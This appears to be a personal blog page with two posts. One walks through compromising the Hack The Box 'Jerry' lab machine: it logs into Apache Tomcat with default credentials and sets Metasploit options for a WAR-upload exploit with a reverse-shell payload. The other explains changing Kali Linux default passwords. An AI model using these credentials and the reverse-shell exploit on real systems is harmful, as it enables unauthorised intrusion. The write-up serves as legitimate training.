default credentials – Michele's Blog

In this blog post, I will explain how I hacked into the Jerry machine on Hack the Box. This hack was made easy by a combination of information disclosure, poor hygiene and use of default credentials.

In order to follow along you need a VIP subscription to Hack The Box (the monthly fee is 12 Euro at the moment), the HTB connection pack (download it from here) and Kali Linux (I’m using version 2020.3).

Create a Connection to the HTB Network

Refer to this post of mine.

Scanning and Enumeration

Open https://www.hackthebox.eu/home/machines and write down Jerry’s IPv4 address. Here we can also see that this is a Windows machine.

We first scan the target machine in order to identify open ports and services running behind those ports.

The scan shows that port 8080 (HTTP) is open. Moreover, we learn that Apache Tomcat 7.0.88 is running on this server. This information will be useful later in this hack.

Open your browser and go to 10.10.10.95:8080 . We see a default page, which is a sign of poor hygiene. Moreover, we also see a link to the manager webapp, which could help us getting access to the server. Let’s click on the link.

The default page of Apache Tomcat/7.0.88 provides the link to the manager webapp.

We are asked for login credentials. We click on cancel and we are redirected to 10.10.10.95:8080/manager/html . Here we get a 403 Access Denied. However, this page offers us a set of default credentials. As this website has poor hygiene, we will try to login with them.

The “403 Access Denied” page provides a set of default credentials.

It worked, we are on the manager page. On this page, we learn that the OS is Windows Server 2012 R2 with amd64 architecture. Moreover, we see that we can upload a WAR file and deploy it. This looks juicy.

We are able to login with those default credentials. We see that we can upload and deploy a WAR file from this page. Let’s see if we can exploit this!

Exploit Jerry

Open your browser and google “war file for tomcat 7.0.88 exploit”. After a bit of research, the multi/http/tomcat_mgr_upload exploit on Metasploit seems to be the best solution for our use case. We are going to use the default payload java/meterpreter/reverse_tcp (a staged payload) this time.

set rhosts 10.10.10.95
set lhost <Your IPv4 address>
set rport 8080
set HttpUsername tomcat
set HttpPassword s3cret

We get a shell and we have access to the Administrator folders and files.

Boom, we are in! Even if it doesn’t say NT AUTHORITY\SYSTEM, we have access to the Administrator account nevertheless! Now you just have to find the two flags. I leave this task as a challenge for you. Tip: they are both in the same folder this time.

I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!

This blog post will explain how to change default credentials in a Kali Linux virtual machine (VM) after spinning it from a 2020.3 OVA image¹.

Since release 2020.1, Kali uses a non-root user policy by default. This means that the default credentials for a pre-created image are²:

username: kali
password: kali

Running a machine with default credentials is like leaving your house door unlocked at night in a bad neighborhood. Let me show you how to lock this door properly.

We will first change root and kali passwords, and then rename the default user together with its home directory and group.

BONUS: su let’s you pretend to be root (you are still in your home directory), whereas su - makes you root (you are in ~, that is, root home directory).

Now change the password for kali too by typing passwd kali. The process is the same as the one in the image above. Now log off and log in again as root.

Rename the default user with your username³: